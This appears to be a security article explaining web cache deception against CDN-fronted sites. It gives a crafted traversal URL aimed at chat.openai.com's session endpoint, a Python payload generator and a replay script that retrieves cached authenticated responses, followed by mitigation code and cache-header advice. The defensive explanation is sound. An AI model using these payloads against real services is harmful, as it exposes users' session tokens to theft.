A newly documented cache deception attack leverages mismatches in path normalization and delimiter handling between caching layers and origin servers to expose sensitive endpoints and steal authentication tokens.
Researchers have demonstrated how subtle discrepancies in URL processing can trick a content delivery network (CDN) into caching protected resources—only for an attacker to retrieve them later, bypassing authentication controls.
Understanding the Vulnerability
At the heart of this attack lies a miscommunication between the cache and the origin server. Caching layers typically identify static assets by file extension or directory prefix, while origin servers enforce routing and access control based on normalized paths.
When those two systems disagree on how to interpret a URL, sensitive pages intended to remain uncached can be stored in shared caches. An attacker can then fetch private data—such as session cookies or API tokens—without ever authenticating.
For example, chat.openai[.]com/api/auth/session.css returns a 400 error and is not cached, because the origin rejects the fake extension outright, whereas chat.openai[.]com/api/auth/session/test.css succeeds and is cached, since the CDN keys its caching decision on the .css suffix while the origin still resolves the request to the session endpoint. The site's static "share" directory offers a similar discrepancy. By requesting a crafted path like:
https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123
the CDN sees a path under the static "share" directory (it neither decodes the %2F sequences nor resolves the ".."), and therefore caches the response, while the origin server decodes and normalizes the path to "/api/auth/session" and returns the session token.
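The mismatch is easy to reproduce in isolation. The short Python sketch below is a simplification for illustration, not any CDN's or origin server's actual code: it contrasts a cache that keys on the raw, undecoded path against an origin that decodes and normalizes the path before routing.

```python
# Simplified model of the cache/origin disagreement (illustrative only).
from urllib.parse import unquote
import posixpath

RAW_PATH = "/share/%2F..%2Fapi/auth/session"

def cache_view(raw_path: str) -> str:
    # Many caches key on the raw path without decoding %2F or resolving "..",
    # so this request appears to live under the static /share/ prefix.
    return "cacheable (static /share/ prefix)" if raw_path.startswith("/share/") else "not cached"

def origin_view(raw_path: str) -> str:
    # Origins typically decode percent-encoding and collapse dot segments
    # before routing, which lands the request on the protected endpoint.
    decoded = unquote(raw_path)          # "/share//../api/auth/session"
    return posixpath.normpath(decoded)   # "/api/auth/session"

print("cache  sees:", cache_view(RAW_PATH))   # cacheable (static /share/ prefix)
print("origin sees:", origin_view(RAW_PATH))  # /api/auth/session
```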
Attack Methodology and Mitigations
Attackers must first identify a directory or file extension that the cache treats as static. They then craft URLs using delimiters or traversal sequences that pass through the cache unchanged but are normalized by the origin. Common techniques include the following (a sketch that turns them into candidate payloads appears after the list):
- Path mapping discrepancies: Appending fake extensions (e.g., .css, .js) to API endpoints.
- Delimiter confusion: Using characters like ;, #, or encoded slashes (%2F) that the cache ignores but the origin processes.
- Normalization exploits: Combining traversal tokens (..) with encoded separators so the cache maps to a static path while the origin resolves to a protected endpoint.
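These techniques can be folded into a simple payload generator for testing one's own endpoints. The target path, static directory, and delimiter set below are illustrative assumptions, not values taken from any particular site.

```python
# Sketch: generate candidate web cache deception payloads for a target endpoint.
TARGET = "/api/auth/session"   # hypothetical protected endpoint
STATIC_DIR = "/share"          # hypothetical directory the cache treats as static

def candidate_payloads(target: str, static_dir: str) -> list[str]:
    payloads = []
    # 1. Path mapping discrepancies: append fake static extensions.
    payloads += [f"{target}{ext}" for ext in (".css", ".js")]
    payloads += [f"{target}/test{ext}" for ext in (".css", ".js")]
    # 2. Delimiter confusion: characters the cache may ignore but the origin parses.
    payloads += [f"{target}{delim}test.css" for delim in (";", "%23", "%3F")]
    # 3. Normalization exploits: encoded traversal out of a static directory.
    payloads.append(f"{static_dir}/%2F..%2F{target.lstrip('/')}")
    return payloads

for payload in candidate_payloads(TARGET, STATIC_DIR):
    print(payload)
```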
A successful exploit often involves three steps, sketched in code after the list:
- Verify caching behavior under a known static directory.
- Test path traversal and delimiter handling to confirm differential normalization.
- Retrieve the cached sensitive resource by requesting the crafted URL.
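Those steps translate into a short test script for checking one's own deployment. The sketch below assumes the requests library, a hypothetical target URL, and a placeholder session cookie; real CDNs expose cache hits through different headers (X-Cache, CF-Cache-Status, Age, and so on), so the check is only indicative.

```python
# Sketch of the three-step check, with assumed target and cookie values.
import uuid
import requests

BASE = "https://example.com"                  # hypothetical target
PAYLOAD = "/share/%2F..%2Fapi/auth/session"   # crafted path as in the earlier example

def looks_cached(resp: requests.Response) -> bool:
    # Presence of any of these headers hints that a shared cache served the response.
    return any(h in resp.headers for h in ("X-Cache", "CF-Cache-Status", "Age"))

# Steps 1-2: request the crafted path once as the authenticated "victim" with a
# unique cache buster, so the shared cache is forced to create a fresh entry.
buster = uuid.uuid4().hex
victim = requests.get(f"{BASE}{PAYLOAD}?cb={buster}",
                      cookies={"session": "VICTIM_SESSION"})   # placeholder cookie

# Step 3: replay the exact same URL with no credentials. A 200 response carrying
# cache-hit headers and the victim's data confirms differential normalization.
attacker = requests.get(f"{BASE}{PAYLOAD}?cb={buster}")
print(attacker.status_code, looks_cached(attacker))
```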
To mitigate such attacks, organizations should enforce consistent URL normalization across all layers and ensure that sensitive endpoints never carry cacheable headers. Proper configuration of cache-control directives is critical:
| Directive | Behavior |
| --- | --- |
| Cache-Control: public | Any intermediary (CDN, proxy, or browser) may cache the response |
| Cache-Control: private | Only the end user's browser may cache; shared caches must not store it |
| Cache-Control: no-store | Prevents caching anywhere, including in browser memory |
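One way to enforce this at the application layer is shown in the Flask sketch below (hypothetical route names, not code from any affected service): it stamps Cache-Control: no-store onto every authenticated API response, so a forgotten per-route header cannot leave a sensitive endpoint cacheable.

```python
# Minimal Flask sketch: force no-store on all authenticated API responses.
from flask import Flask, jsonify, request

app = Flask(__name__)

@app.get("/api/auth/session")          # hypothetical authenticated endpoint
def session_info():
    # ... authentication and token lookup would happen here ...
    return jsonify({"token": "redacted"})

@app.after_request
def harden_api_caching(resp):
    # Defence in depth: every response under /api/ leaves with no-store,
    # so neither a CDN, a proxy, nor the browser will retain it.
    if request.path.startswith("/api/"):
        resp.headers["Cache-Control"] = "no-store"
    return resp
```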
Developers should audit CDN rules to reject requests containing unexpected delimiters or encoded traversal sequences.
Additionally, origin servers must apply strict routing rules that reject requests carrying unexpected suffixes rather than silently ignoring them, and return appropriate cache-control headers (e.g., no-store) on all authenticated endpoints.
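Both recommendations can be approximated with a pre-routing check that refuses any request whose decoded, normalized path differs from its raw form, or that carries delimiters a cache is likely to ignore. The delimiter list below is an assumption and would need tuning per deployment.

```python
# Illustrative pre-routing check, framework-agnostic and intentionally simple.
from urllib.parse import unquote
import posixpath
import re

SUSPICIOUS = re.compile(r"%2f|%5c|%23|;", re.IGNORECASE)  # encoded /, \, # and ";"

def is_suspicious(raw_path: str) -> bool:
    if SUSPICIOUS.search(raw_path):
        return True
    # A path that changes once decoded and normalized is exactly the gap
    # a cache deception payload relies on.
    return posixpath.normpath(unquote(raw_path)) != posixpath.normpath(raw_path)

assert is_suspicious("/share/%2F..%2Fapi/auth/session")   # crafted payload -> reject
assert not is_suspicious("/api/auth/session")             # normal request -> allow
```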
Regular cache-behavior testing, for example against resources such as PortSwigger's Web Security Academy labs, can help identify misconfigurations before they are exploited in the wild.
By aligning cache and origin interpretations of URLs and rigorously tagging private content as non-cacheable, organizations can close this novel vector for unauthorized data exposure.